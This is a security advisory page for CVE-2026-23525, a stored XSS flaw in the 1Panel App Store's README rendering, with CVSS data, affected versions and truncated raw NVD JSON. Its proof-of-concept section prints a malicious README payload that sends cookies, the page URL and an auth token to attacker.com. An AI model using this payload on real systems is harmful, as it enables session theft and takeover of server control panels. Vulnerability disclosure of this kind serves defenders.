Security Vulnerability Report
CVE-2026-23525 CVSS 6.4 MEDIUM

CVE-2026-23525

Published: 2026-01-18 23:15:48
Last Modified: 2026-03-13 14:29:09

Description

1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
Weakness: CWE-79 (Cross-Site Scripting)

Note: the 6.4 MEDIUM score above is the secondary (GitHub) assessment. The NVD primary assessment rates the same issue 8.4 HIGH (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H), treating attack complexity as low and the scope as changed.

Configurations (Affected Products)

cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.10.34: 1Panel v1.10.33-lts and earlier)
cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:* - VULNERABLE (versions from 2.0.0 before 2.0.17: 1Panel v2.0.16 and earlier)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```markdown
<!-- Example malicious app README payload -->
# Malicious App

<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Or use a script tag -->
<script>
// Steal the user's session information
var session = document.cookie;
var data = JSON.stringify({
  url: window.location.href,
  cookie: session,
  localStorage: localStorage.getItem('auth_token')
});
// Send to an attacker-controlled server
fetch('https://attacker.com/collect', {
  method: 'POST',
  body: data,
  headers: {'Content-Type': 'application/json'}
});
// Further exploitation: modify user settings or escalate privileges
console.log('XSS Payload Executed');
</script>
```

References

https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-mg24-6h5c-9q42

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23525", "sourceIdentifier": "[email protected]", "published": "2026-01-18T23:15:48.220", "lastModified": "2026-03-13T14:29:08.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17."}, {"lang": "es", "value": "1Panel es un panel de control de código abierto, basado en web, para la gestión de servidores Linux. Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en la Tienda de Aplicaciones de 1Panel al ver los detalles de la aplicación. 
Scripts maliciosos pueden ejecutarse en el contexto del navegador del usuario, potencialmente comprometiendo datos de sesión o interfaces sensibles del sistema. Todas las versiones de 1Panel hasta e incluyendo v1.10.33-lts y v2.0.16 están afectadas. Un atacante podría publicar una aplicación maliciosa que, cuando es cargada por los usuarios (local o remotamente), puede ejecutar scripts arbitrarios. Esto puede resultar en el robo de cookies de usuario, acceso no autorizado a funciones del sistema u otras acciones que comprometan la confidencialidad, integridad y disponibilidad del sistema. La vulnerabilidad es causada por una sanitización insuficiente del contenido renderizado por el componente MdEditor con el atributo 'previewOnly' habilitado. Específicamente, la Tienda de Aplicaciones renderiza contenido README de la aplicación sin la protección XSS adecuada, permitiendo la ejecución de scripts durante la renderización del contenido; y problemas similares existen en componentes relacionados con la actualización del sistema, los cuales pueden ser solucionados implementando una sanitización XSS adecuada en el componente MdEditor. Estas vulnerabilidades pueden ser mitigadas aplicando protección y sanitización XSS adecuadas al renderizar contenido en el componente MdEditor. 
Las versiones seguras con un parche incorporado son v1.10.34-lts y v2.0.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.34", "matchCriteriaId": "F5968FDD-8F6D-487E-9326-0949B42D2BA3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.17", "matchCriteriaId": "5D333955-D761-4982-A30A-D59D1735FCFD"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-mg24-6h5c-9q42", "source": "[email protected]", "tags": ["V ... (truncated)